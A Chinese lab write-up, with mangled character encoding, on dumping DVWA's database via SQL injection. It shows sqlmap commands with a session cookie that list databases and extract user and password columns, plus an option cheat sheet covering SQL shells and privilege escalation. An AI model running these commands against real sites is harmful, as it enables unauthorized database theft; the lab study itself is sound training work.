溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

記一次初級(jí)dvwa爆庫(kù)

發(fā)布時(shí)間:2020-07-07 02:53:45 來(lái)源:網(wǎng)絡(luò) 閱讀:1365 作者:嘻哈music 欄目:數(shù)據(jù)庫(kù)

前期準(zhǔn)備

1 sqlmapwindows環(huán)境下需要python2.7的支持,python官網(wǎng)下載即可

https://www.python.org/

2 安裝python2.7,默認(rèn)即可。安裝完成后需要配置下環(huán)境變量。右擊計(jì)算機(jī)->高級(jí)系統(tǒng)設(shè)置->環(huán)境變量,找到系統(tǒng)變量的Path選項(xiàng),雙擊,在最后添加;C:\Python27“;”必須要有,如果有其他python,可以刪掉。這是我的安裝路徑。

記一次初級(jí)dvwa爆庫(kù) 

3 windows+R,輸入cmd打開(kāi)dos界面,輸入python進(jìn)行測(cè)試python是否安裝成功。

記一次初級(jí)dvwa爆庫(kù) 

返回python版本號(hào),安裝成功

4 下載sqlmap,可以到我的百度云下載:http://pan.baidu.com/s/1skPClzR 密碼:ndpj。

解壓后,改名為sqlmap,放到磁盤(pán)中

記一次初級(jí)dvwa爆庫(kù) 

5 打開(kāi)cmd,切換到sqlmap對(duì)應(yīng)磁盤(pán)

記一次初級(jí)dvwa爆庫(kù) 

6 至此,sqlmap安裝完畢

開(kāi)始爆庫(kù)

1 dvwa安全級(jí)別設(shè)置為low,采用的是cookie注入。點(diǎn)擊sql注入,使用burpsuite抓包拿cookie

記一次初級(jí)dvwa爆庫(kù) 

2 urlcookie都需要使用,打開(kāi)剛才開(kāi)的cmd,鍵入

Sqlmap.py -u http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit --cookie “security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1” --risk 3 --level 5 ,中途出現(xiàn)選擇項(xiàng)直接回車(chē)

記一次初級(jí)dvwa爆庫(kù) 

3  明顯看到有mysql數(shù)據(jù)庫(kù),先將數(shù)據(jù)庫(kù)顯示出來(lái)sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" --dbs

 

記一次初級(jí)dvwa爆庫(kù) 

4 可以看到有幾個(gè)數(shù)據(jù)庫(kù),然后選擇dvwa數(shù)據(jù)庫(kù),列表名

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa --tables

記一次初級(jí)dvwa爆庫(kù) 

5 出現(xiàn)兩個(gè)表名,肯定有用的是users表名,然后暴列名

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users --columns

記一次初級(jí)dvwa爆庫(kù) 

6 看到了很多列名,最有用的當(dāng)然是用戶和密碼了,導(dǎo)出用戶和密碼

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users -C user,password,user_id --dump

記一次初級(jí)dvwa爆庫(kù) 

7 好了至此完畢,接下來(lái)是sqlmap的命令解釋大全

-u #注入點(diǎn)

-g 谷歌搜索

-f #指紋判別數(shù)據(jù)庫(kù)類(lèi)型

-b #獲取數(shù)據(jù)庫(kù)版本信息

-p #指定可測(cè)試的參數(shù)(?page=1&id=2 -p page,id)

-D “” #指定數(shù)據(jù)庫(kù)名

-T “” #指定表名

-C “” #指定字段

-s “” #保存注入過(guò)程到一個(gè)文件,還可中斷,下次恢復(fù)在注入(保存:-s xx.log”  恢復(fù):-s xx.log” –resume)

columns #列出字段

current-user #獲取當(dāng)前用戶名稱

current-db #獲取當(dāng)前數(shù)據(jù)庫(kù)名稱

users #列數(shù)據(jù)庫(kù)所有用戶

passwords #數(shù)據(jù)庫(kù)用戶所有密碼

privileges #查看用戶權(quán)限(privileges -U root)

-U #指定數(shù)據(jù)庫(kù)用戶

dbs #列出所有數(shù)據(jù)庫(kù)

tables -D “” #列出指定數(shù)據(jù)庫(kù)中的表

columns -T user-D mysql#列出mysql數(shù)據(jù)庫(kù)中的user表的所有字段

dump-all #列出所有數(shù)據(jù)庫(kù)所有表

exclude-sysdbs #只列出用戶自己新建的數(shù)據(jù)庫(kù)和表

dump -T “” -D “” -C “” #列出指定數(shù)據(jù)庫(kù)的表的字段的數(shù)據(jù)(dump -T users -D master -C surname)

dump -T “” -D “” –start 2 top 4 # 列出指定數(shù)據(jù)庫(kù)的表的2-4字段的數(shù)據(jù)

dbms #指定數(shù)據(jù)庫(kù)(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)

os #指定系統(tǒng)(Linux,Windows)

--sql -shell 寫(xiě)shell

--delay 延遲的時(shí)間

--safe-freq 次數(shù)

-v #詳細(xì)的等級(jí)(0-6)

0:只顯示Python的回溯,錯(cuò)誤和關(guān)鍵消息。

1:顯示信息和警告消息。

2:顯示調(diào)試消息。

3:有效載荷注入。

4:顯示HTTP請(qǐng)求。

5:顯示HTTP響應(yīng)頭。

6:顯示HTTP響應(yīng)頁(yè)面的內(nèi)容

privileges #查看權(quán)限

is-dba #是否是數(shù)據(jù)庫(kù)管理員

roles #枚舉數(shù)據(jù)庫(kù)用戶角色

udf-inject #導(dǎo)入用戶自定義函數(shù)(獲取系統(tǒng)權(quán)限)

union-check #是否支持union 注入

union-cols #union 查詢表記錄

union-test #union 語(yǔ)句測(cè)試

union-use #采用union 注入

union-tech orderby #union配合order by

 

 












向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI